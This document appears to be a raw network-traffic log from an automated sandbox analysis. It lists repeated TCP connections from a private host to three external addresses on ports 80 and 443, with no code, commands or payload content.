Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 172.67.177.134:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443
Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 104.21.67.152:443

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic	TCP traffic: 38.242.255.115:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic	TCP traffic: 38.242.255.115:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 38.242.255.115:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 38.242.255.115:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
